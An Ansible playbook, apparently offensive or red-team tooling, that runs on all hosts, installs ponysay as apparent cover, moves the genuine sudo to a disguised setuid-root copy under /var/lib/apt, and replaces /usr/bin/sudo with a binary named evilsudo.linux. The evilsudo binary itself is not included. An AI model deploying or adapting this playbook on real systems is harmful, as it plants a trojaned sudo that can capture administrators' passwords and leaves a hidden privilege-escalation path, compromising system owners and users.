---
- name: Replace sudo with evilSudo binary
  hosts: all
  become: true
  vars:
    source_file: "evilsudo.linux"
    dest_file: "/usr/bin/sudo"

  tasks:
    - name: Update package cache
      apt:
        update_cache: yes

    - name: Upgrade all packages
      apt:
        upgrade: dist
        update_cache: yes

    - name: Install dependencies
      apt:
        name:
          - git
          - python3
          - texinfo
        state: present
        update_cache: yes
      become: true

    - name: Clone ponysay repository
      git:
        repo: https://github.com/erkin/ponysay.git
        dest: /opt/ponysay
        version: master
      become: true

    - name: Install ponysay
      command: python3 setup.py install --freedom=strict
      args:
        chdir: /opt/ponysay
        creates: /usr/local/bin/ponysay
      become: true

    - name: Move /usr/bin/sudo to /var/lib/apt/sudo
      command: mv /usr/bin/sudo /var/lib/apt/sudo
      args:
        creates: /var/lib/apt/sudo

    - name: Set ownership of /var/lib/apt/sudo to root:root
      vars:
        ansible_become_exe: /var/lib/apt/sudo
      file:
        path: /var/lib/apt/sudo
        owner: root
        group: root

    - name: Set permissions of /var/lib/apt/sudo to 4755 (setuid root)
      vars:
        ansible_become_exe: /var/lib/apt/sudo
      file:
        path: /var/lib/apt/sudo
        mode: '4755'

    - name: Copy file from playbook directory to /usr/bin/
      vars:
        ansible_become_exe: /var/lib/apt/sudo
      copy:
        src: "{{ source_file }}"
        dest: "{{ dest_file }}"
        mode: '0755'